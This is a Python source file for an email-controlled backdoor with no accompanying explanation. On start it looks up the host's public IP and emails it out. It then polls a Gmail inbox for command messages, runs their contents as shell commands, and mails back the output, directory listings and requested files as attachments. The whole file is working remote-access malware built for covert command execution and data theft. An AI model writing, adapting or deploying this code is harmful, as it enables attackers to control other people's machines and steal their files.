#1
def getPubIp():#2
    import socket#3
    website="start.parrotsec.org"#4
    ip =socket.gethostbyname(website)#5
    port=80#6
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#7
    s.connect((ip,port))#8
    se="GET / HTTP/1.1\nHost: "+ip+"\n\n"#9
    s.send(se.encode('ascii'))#10
    total=""#11
    started=False#12
    while True:#13
        re=s.recv(1024).decode('ascii')#14
        total+=re#15
        if len(re)==0:#16
            break#17
    result=""#18
    total=total.split("\n")#19
    for line in total:#20
        if 'Your IP' in line:#21
            result=line#22
            break#23
    result=result.split(" ")#24
    ip=result[-1]#25
    ip=ip[:-7]#26
    s.close()#27
    return "Host connected with IP: "+ip#28
#29
#30
#31
#32
#33
#34
def send(subject,message,fileName=""):#35
    import smtplib#36
    from email.mime.text import MIMEText#37
    from email.mime.multipart import MIMEMultipart#38
    from email.mime.base import MIMEBase#39
    from email import encoders#40
    userName='Email_Address'#41
    password='Email_Password'#42
    msg = MIMEMultipart()#43
    msg['From'] = userName#44
    msg['To'] = userName#45
    msg['Subject'] = subject#46
    body = message#47
    msg.attach(MIMEText(body,'plain'))#48
    if len(fileName)>0:#49
        attachment=open(fileName,'rb')#50
        part = MIMEBase('application','octet-stream')#51
        part.set_payload((attachment).read())#52
        encoders.encode_base64(part)#53
        part.add_header('Content-Disposition',"attachment; filename= "+fileName)#54
        msg.attach(part)#55
    text = msg.as_string()#56
    server = smtplib.SMTP('smtp.gmail.com',587)#57
    server.ehlo()#58
    server.starttls()#59
    server.login(userName,password)#60
    server.sendmail(userName,userName,text)#61
    server.quit()#62
    #63
def execute(order):#64
    import os#65
    if "+system" in order:#66
        os.system(order[9:]+" >result")#67
        send(order[9:],'resultFile',"result")#68
    if "+listdir" in order:#69
	filesl=os.listdir()
        files=""
        for i in filesl:
            files+=i
            if os.path.isdir(i):
                files+="    d"
            files+="\n"
        send('listdir',files)#70
    if "+getcwd" in order:#71
        send('getcwd',str(os.getcwd()))#72
    if "+goto" in order:#73
        if os.path.exists(order[7:]):#74
            os.chdir(order[7:])#75
        execute("+getcwd")#76
    if "+download" in order:#77
        if os.path.exists(order[11:]):#78
            send(order[11:],"Here is your file",order[11:])#79
    if "+getPubIp" in order:#80
        send("IP",getPubIp())#81
    if order=="+EXIT+":#82
        exit(0)#83
  #84
def receiveOrder(prevOrder):#85
    import email#86
    import imaplib#87
    from re import findall#88
    from base64 import b64decode#89
    userName='Email_Address'#90
    password='Email_Password'#91
    mail=imaplib.IMAP4_SSL("imap.gmail.com")#92
    mail.login(userName,password)#93
    mail.select("INBOX")#94
    emailID=mail.uid("search",None,"all")[1][0].split()[-1]#95
    commandEmail=mail.uid("fetch",emailID,'(RFC822)')[1][0][1].decode('utf-8')#96
    commandEmail=email.message_from_string(commandEmail)#97
    subject=commandEmail['Subject']#98
    #Content-Transfer-Encoding: 7bit#99
    order=findall(r"Content-Transfer-Encoding: 7bit\n+(.*?)\n",str(commandEmail))[0]#100
    #order=str(b64decode(order))[2:-5]#101
    if order != prevOrder and subject=='command':#102
        execute(order)#103
    return order#104
#105
#106
execute("+getPubIp")#107
order=""#108
while True:#109
    order=receiveOrder(order)#110
